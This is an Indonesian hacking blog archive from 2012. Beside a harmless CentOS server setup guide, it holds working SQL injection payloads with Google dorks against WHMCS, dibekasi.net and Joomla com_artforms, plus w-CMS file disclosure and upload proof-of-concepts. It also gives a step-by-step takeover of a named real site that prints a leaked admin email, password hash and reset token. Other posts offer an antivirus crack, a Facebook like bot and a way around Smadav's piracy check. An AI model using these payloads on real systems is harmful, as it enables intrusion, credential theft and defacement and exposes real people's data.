Jumat, 20 April 2012

Konfigurasi Service di VPS dengan OS CentOS


Konfigurasi Service di VPS dengan Linux CentOS

Jika anda sudah punya VPS dengan OS Linux Centos. Apa lagi yang harus anda lakukan?

Agar website bisa diakses, anda perlu menginstal dns server, web server dan mysql server dulu. Proses instalasi dilakukan melalui SSH. Jika komputer anda menggunakan Linux, silahkan SSH melalui aplikasi terminal anda dengan command: ssh root@ipserver. Jika anda pengguna Windows silahkan download dulu aplikasi Putty yang bisa anda cari melalui Google.
Setelah masuk ke SSH server, lakukan dulu update pada repo OS server anda agar proses install berjalan lancar. Silahkan ketik command: apt-get update atau yum update. Tunggu sampai proses selesai
1. Setting DNS Server
Lakukan proses instalasi otomatis dengan mengetikkan command: yum install bind bind-chroot bind-libs bind-utils caching-nameserver
• setting named.conf
Ketik command: nano/var/named/chroot/etc/named.conf
Kemudian tambahkan/ketik setting di bawah ini (ganti domainku.com dengan nama domain anda):
zone “domainku.com” IN {
type master;
file “domainku.db”;
};
Jika sudah, Ctrl-X lalu save
• setting zone
Ketik command : nano /var/named/chroot/var/named/domainku.db
Kemudian tambahkan/ketik setting seperti di bawah ini, (Ganti IP server default 192.168.10.1 dengan IP server anda)
$ttl 38400
domainku.com. IN SOA ns.domainku.com. admin.domainku.com. (
2007020400 ; Serial
10800 ; Refresh after 3 hours
3600 ; Retry after 1 hour
604800 ; Expire after 1 week
86400 ) ; Minimum TTL of 1 day
domainku.com. IN NS ns.domainku.com.
domainku.com. IN MX 1 mx.domainku.com.
domainku.com. IN MX 5 mx2.domainku.com.
www.domainku.com. IN A 192.168.10.1
ns.domainku.com. IN A 192.168.10.1
mrtg.domainku.com. IN A 192.168.10.1
mx.domainku.com. IN A 192.168.10.1
mx2.domainku.com. IN A 192.168.10.1
mail.domainku.com. IN CNAME mx.domainku.com.
Jika sudah, Ctrl-X lalu save
• Setting resolv.conf
Ketik command: nano /etc/resolv.conf
Ubah nameserver menjadi: nameserver 127.0.0.1
Kemudian Ctrl-X lalu save
Dan Restart service dengan menjalankan command: service network restart
• Start DNS server
Jalankan command: service named start
Agar DNS berjalan saat proses startup, jalankan juga command : chkconfig named on
2. Setting Webserver
Bagi webserver, ada beberapa service yang bisa dipakai. Disini kami memakai Apache. Lakukan proses instalasi otomatis dengan menjalankan command: yum install -y php php-devel php-gd php-mbstring php-mcrypt php-imap php-ldap php-mysql php-odbc php-pear php-xml php-xmlrpc curl curl-devel perl-libwww-perl ImageMagick libxml2 libxml2-devel
Kemudian start service httpd dengan command: /etc/init.d/httpd start
Agar apache berjalan saat proses startup, jalankan command: chkconfig –levels 235 httpd on
cek apakah httpd telah berjalan dengan mengakses IP server anda. Jika berhasil, akan tampil halaman default.
3. Setting MySQL server
Lakukan proses instalasi otomatis dengan menjalankan command: yum install -y mysql mysql-servermysql mysql-server mysql-devel
Kemudian start MySQL dengan command: /etc/init.d/mysqld start
Agar MySQL berjalan saat proses startup, jalankan: chkconfig –levels 235 mysqld on
Setting password MySQL anda: mysqladmin -u root password abcd
• Install PHP pada server anda
Ketik command: yum install -y php php-devel php-gd php-mbstring php-mcrypt php-imap php-ldap php-mysql php-odbc php-pear php-xml php-xmlrpc curl curl-devel perl-libwww-perl ImageMagick libxml2 libxml2-devel
• Install phpMyAdmin untuk mempermudah mengolah database
Silahkan update repo sesuai versi PHP anda, untuk mendownload silahkan ketik command: wget http://packages.sw.be/rpmforge-release/rpmforge-release-0.5.1-1.el5.rf.i386.rpm
Atau: rpm -Uvh rpmforge-release-0.5.1-1.el5.rf.x86_64.rpm
Tergantung dengan versi Centos anda 32 bit atau 64 bit. ketik command: uname-i untuk mengetahui versi Centos anda.
Install phpMyAdmin dengan command: yum -y install phpmyadmin
Edit file phpmyadmin.conf dengan ketik command: nano /etc/httpd/conf.d/phpmyadmin.conf
Delete yang lain dan biarkan isinya seperti di bawah ini:
Alias /phpmyadmin /usr/share/phpmyadmin
Alias /phpMyAdmin /usr/share/phpmyadmin
Alias /mysqladmin /usr/share/phpmyadmin
Lalu edit file config.inc.php dengan command: nano /usr/share/phpmyadmin/config.inc.php
Kemudian ubah baris berikut:
$cfg['Servers'][$i]['auth_type'] = ‘cookie‘;
$cfg['blowfish_secret'] = ‘sdf934sdfgHijh98Y‘;
Pada cookie, ubah menjadi “http” dan pada blowfish_secret isikan random seperti contoh diatas.
Pada httpd.conf tambahkan baris berikut :

Order allow,deny
Allow from all
Set permision filenya dengan command:
# chmod g+w -R /var/www/html/phpmyadmin/
# chown apache.apache -R /var/share/phpmyadmin/
Kemudian restart sevice httpd dengan command: service httpd restart
4. Setting FTP server
Download file instalasi dengan command: wget ftp://ftp.proftpd.org/distrib/source/proftpd-1.3.1.tar.gz
Extract hasil download filenya: tar xzvf proftpd-1.3.1.tar.gz
Lakukan konfigurasi dan install proftpd, dengan command-command berikut:
# cd proftpd-1.3.1
# ./configure –prefix=/usr/local/proftpd
# make; make install

Masuk ke file konfigurasi: nano /usr/local/proftpd/etc/proftpd.conf
Ubah beberapa setting sesuai dengan setting dibawah ini:
ServerName “ProFTPD Default Installation”
ServerType standalone
DefaultServer on
Port 21
Umask 022
MaxInstances 30
User nobody
Group nogroup
DefaultRoot ~
AllowOverwrite on
DenyAll
Lalu save konfigurasi tersebut.
Buat usergroup nogroup dengan command: groupadd nogroup
Jalankan server FTP, dengan command: ./usr/local/proftpd/sbin/proftpd
Buat otomatis start saat server booting dengan mengedit rc local. Ketik: nano /etc/rc.d/rc.local Kemudian tambahkan satu baris berikut: /usr/local/proftpd/sbin/proftpd
Selesai. Service-service VPS anda kini telah siap

Buat Sobat Bloger yang ingin tukar link Bisa Kunjungi Link ini

Sabtu, 14 April 2012

WHMCS Vulnerable

#=Info=======================================================================#
# Software: WHMCS control (WHMCompleteSolution)  Sql Injection                                                #
#                                                                                                                                       #
# Vulnerability: Remote Sql Injection                                                                                         #
# Google Dork: Powered by WHMCompleteSolution - or " inurl:WHMCS                                          

 
 
#=Sql Injection ===========================================================================================================================================================#
# Exploit: http://site/submitticket.php?step=2&deptid=001' and 1=0 union all select 1,2,3,4,message,6,7,8,9,10 from tbltickets--%20                                     
# DOWNLOAD : http://www.whmcs.com/                                                                                                                                    
# Live demo: http://ste/support/submitticket.php?step=2&deptid=001' and 1=0 union all select 1,2,3,4,username,6,7,8,password,10 from tbladmins--%20                
#=========================================================================================================================================================================#


 Dork :inurl:"weblink_cat_list.php?bcat_id="
**************************************************************************/
[ Vulnerable File ]
 
http://server/weblink_cat_list.php?bcat_id=[N.A.S.T ]
 
[ Exploit ]
 
http://server/weblink_cat_list.php?bcat_id=-1+UNION+SELECT+1,GROUP_concat(id,0x3a,username,0x3a,password),3,4+from+user
 
 
[  GReets ]
Buat Sobat Bloger yang ingin tukar link Bisa Kunjungi Link ini

Selasa, 10 April 2012

Facebook Auto Comment And Like Generator Final


Facebook Auto Comment And Like Generator Final




Buat temen temen yang lagi nyari BOT Like Facebook , Aplikasi ini cocok banget kayaknya, Selain untuk Bot Like Facebook aplikasi ini juga sekaligus sebagai auto coment.
Melengkapi update sebelumnya,dimana kembali dilakukannya improvement dari pihak pengembang Facebook, berikut kami release update terbaru Facebook Auto Comment And Like Generator .

*Tidak ada penambahan feature pada update terbaru ini.

Silahkan download Applikasi : klik di sini

==================================================

Cara Penggunaan Facebook Auto Comment And Like Generator

 ==================================================
 - Konek ke Facebook  (Tombol Connect)
 - Login ke Akun melalui browser yang ada di aplikasi
 - Setting
   > Isi komentar  (untuk Auto Comment)
   > Check [Friend Mention] untuk menyebut Nama teman dalam komentar
   > Untuk mengecualikan seseorang dari aksi BOT, setting pada Expection
   > Pilih target bot
   > Set Interval waktu

 - Start


Buat Sobat Bloger yang ingin tukar link Bisa Kunjungi Link ini

w-CMS 2.0.1 Multiple Vulnerabilities


w-CMS 2.0.1 Multiple Vulnerabilities
PoC/Exploit:

1.# Local File Disclosure [LFD]

~ [PoC]Http://[victim]/path/?p=../../../../../../boot.ini
~ [PoC]Http://[victim]/path/index.php?p=../../../../../../boot.ini
~ [PoC]Http://[victim]/path/?p=../../../../../../etc/passwd
~ [PoC]Http://[victim]/path/index.php?p=../../../../../../etc/passwd
# Admin Pass Disclosure
~ [PoC]Http://[victim]/path/index.php?p=../../password

+----------------------------------------------------------------------+

2.# Local File Edit/Write
~ [PoC]Http://[victim]/admin.php?edit=../../../dz0.php

Just Fill The Text Area With Evil Code (Php) & Click Save

+----------------------------------------------------------------------+

3.# Cross Site Scripting (XSS)

~ [PoC]Http://[victim]/path/?p=
~ [PoC]Http://[victim]/path/index.php?p=

+----------------------------------------------------------------------+

4.# Html Code Injection
~ [PoC]Http://[victim]/path/(Guestbook Path)Or(Contact Path)
You Can Inject Html Code In The text Area
Exapmle :
++ You Can Inject Xss Too
Exapmle :

+----------------------------------------------------------------------+

5.# Cross Site Request Forgny (CSRF) Admin Change Pass


~ [PoC] Inject This Evil Code In Contact Form


+----------------------------------------------------------------------+

6.# Arbitary File Upload
~ [PoC]Http://[victim]/admin.php

# Add Folder


# Upload File





Crack Avast Internet Security 7 Free Download


Crack Avast Internet Security 7 Free Download


Kemarin saya sudah share license key avast Internet security 7, sekarang saya akan share yang lebih ampuh lagi ni sob, yakni Crack Avast Internet Security 7. Silahkan langsung di cek buat para pengguna Avast Internet Security 7.

Di dalam paket download, sudah tersedia tutorial untuk menggunakan Crack Avast Internet Security 7. Buat yang belum install avast, dan tertarik mencobanya, silahkan anda langsung download di situs resminya saja.disini



Avast! Internet Security 7.0.1407 Final 
 

Setelah di download baru kita Download Crack nya.
Cracknya bisa di download disini


Buat Sobat Bloger yang ingin tukar link Bisa Kunjungi Link ini

Senin, 09 April 2012

Cara Menghilangkan Blacklist Smadav 8.7.2


Menghilangkan Blacklist Smadav



Cara Menghilangkan Blacklist Smadav 8.7.2

Baru pulang kuliah, buka laptop terus cek email, eh ada salah satu pengunjung remoxp request cara aktivasi smadav 8.7.2 dan bagaimana menghilangkan blacklist. Penasaran kan?? simak tips menghilangkan blacklist smadav 8.72 berikut ini.

Saya sendiri mungkin kalau tidak ada yang request smdav via email tidak akan tahu kalau smadav sudah merilis versi terbarunya, yakni smadav 2011 rev 8.7.2. Thanks yah buat yang sudah kirim email, hehe.

Tanpa basa-basi, saya langsung update aja smadav,dan apa yang terjadi?? Smadav saya menjadi hitam pekat??!! Ketahuan bajakan!! Pastinya,, Hahahaha
Saya coba menghilangkan tanda bajakan dengan memasukan "anti-pembajakan" dan "anti-bajakan" dan ternyata tidak berhasil!! Wow,, ada apa ini?? Sepertinya Smadav telah meningkatkan proteksi blacklistnya. Putar otak deh,, hehee

Setelah coba berbagai cara, dan hasilnya gagal lagi gagal lagi, akhirnya smadav 8.7.2 saya uninstall. Saya install smadav versi jadul, yakni Smadav 8.4. Di smadav 8.4 ini smadav saya masih terblacklist (tampilan hitam), kemudian saya coba menghilangkan tanda bajakan, dan ternyata "BERHASIL"!! Smadav saya jadi hijau kembali, tapi tunggu ini masih Smadav 8.4. Saya langsung install Smadav 8.7.2 (ditiban) dan kondisi smadav 8.4 masih free, dan hasilnya Smadav 8.7.2 ikutan hijau. Hore..!!! hehe




smadav 8.7.2 

Setelah Smadav 8.7.2 sudah hijau atau tanda blacklistnya sudah hilang, saya mencoba memasukan key dari keygen Smadav 2011, dan ternyata "BERHASIL". Kini Smadav 8.7.2 saya sudah pro kembali.

Apa yang baru di Smadav 8.7??
Penambahan database 100 virus baru, Teknik pendeteksian baru (FFD) : pencegahan total untuk virus dari USB Flashdisk, Fitur bahasa inggris sudah bisa digunakan di Smadav Free, Perubahan struktur settings, dsb.

Silahkan cermati pengalaman beserta tips yang saya berikan di atas. Saya tidak akan menjelaskan nya kembali di komentar apabila ada yang bertanya.

Salam Pembajakan,

Exploit Wordpress With upload-form.php


Lagi lagi Deface. Kenapa sich pada doyan deface.
Kali ini ane mau Shared cara Deface Wordpress dengan EXPLOIT WORDPRESS
Langsung aja di Cobain Exploit Wordpress nya.
di jamin Yahuud...


Dork: inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php
Hasilnya di  /wp-content/uploads/2012/04/hasil.txt


Buat Sobat Bloger yang ingin tukar link Bisa Kunjungi Link ini

Exploit + ADMIN PAGE NEW UPDATE

################################################################################​#
title : powered by dibekasi.net SQLi vulner
author : bumble_be
contact : iogi89@ymail.com
web : bumble-be.us / linggau-haxor.com
################################################################################​########
dork : allinurl: page_info.php?id_brt=
vendor : dibekasi.net


=============exploit===============
+AND+1=2+UNION+SELECT+1,2,3,4,5,sql c0de,7,8,9,10,11,12,13,14,15,16--
=============Vuln In here===========
http://webtarget.com/page_info.php?id_brt=70'[your Sql c0de]&id_ktgbr=16
=============live Demos============
http://www.butikgaul.com/page_info.php?id_brt=70+AND+1=2+UNION+SELECT+1,2,3,4,5,version%28%29,7,8,9,10,11 ​,12,13,14,? ?15,16–&id_ktgbr=16
greet : devilzc0de.org, indonesianhacker.org, palembanghackerlink.org, hacker-newbie.org, bumble-be.us
Greetz : DC crew :
flyff666,chaer.newbie, petimati, cruz3n,mywisdom, whitehat, gunslinger, ketek, xtr0nic, revtan,t3mp3, el_nino, wahyu_devilzc0de
IH crew :
r3mick, otong, bobyhikaru, Aa , RxN7 , sudden_death, shadowsmaker, Pl4nkt0n, syntax_eRroR, ichito-bandito, system_RTO, cah_surip, cs-31,demnas
###########################################################################



----------------------------------------
POWERED BY: XXHX
contact : xxhxmx.zx@gmail.com
----------------------------------------
Dork:
Code:
inurl:/page_main.php?id_stdpg=
vuln : http://target.com/page_main.php?id_stdpg=


NEW Dork:
Code:
inurl:/page_member_reg.php?id_prop=
vuln : http://target.com/page_member_reg.php?id_prop=

ADMIN PAGE:
Code:
http://target.com/68651519/68530744.php
Note:admin page juga berlaku untuk dibekasi versi terbaru.

DECRYPTER:
Code:
[url]http://hacker-newbie.org/showthread.php?tid=9171[/url]
by Dika_xb

source : http://hacker-newbie.org/showthread.php?tid=8780



Buat Sobat Bloger yang ingin tukar link Bisa Kunjungi Link ini

Senin, 02 April 2012

Joomla Exploit


targetnya
cari di google
pake dork ini

inurl:"option com_artforms"

jangan malas mencari -_- di google :D

kita dapat target yaitu :

http://www.avaclean.com/

di exploid
ni kodenya di paste ke target tadi

/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--


ntar jadi nya kyak gini

http://sitetarget.com//index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users--

disitu udah kelihatan emailnya

josh@bkmediagroup.comadminjosh@bkmediagroup.com:josh@bkmediagroup.com4fffa8274459e218833756e3149ab20d:jWtEsQNqFQPZchh86wvmnO3XIlTOwZ9P

nah open tab lagi ya kk mastah :)

terus
copy code reset pass ini

/index.php?option=com_user&view=reset

terus masukin kode reset paswordnya  menjadi seperti ini :

http://www.avaclean.com//index.php?option=com_user&view=reset

setelah itu disuruh masukin email nantinya

masukin email yg kita dapat tadi
yaitu

josh@bkmediagroup.com

setelah di enter
anda disuruh masukin code :

kita tinggalin dulu yg ini
kita cari kode tsb di
web yg kita exploid tadi

open tab lagi neh untuk ngambil token nya :)

masukan code ini :

/index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users

ntar jadi nya gini

http://sitetarget.com//index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users

code nya :

admineda7d6142fac40a533b56407a4617371

nah kita kembali ke halaman reset tadi

kita masukin aja token yang ini

eda7d6142fac40a533b56407a4617371

truss enter :)) eehhh minta password baru dech dia :D

uppzzzzz kita masukin aja dech password kita :))

setelah udah masukin

kita masuk ke halaman admin nya

contoh :

http://sitetarget.com/administrator

nah masukin user nya :) & password kita :D

Buat Sobat Bloger yang ingin tukar link Bisa Kunjungi Link ini
Ada kesalahan di dalam gadget ini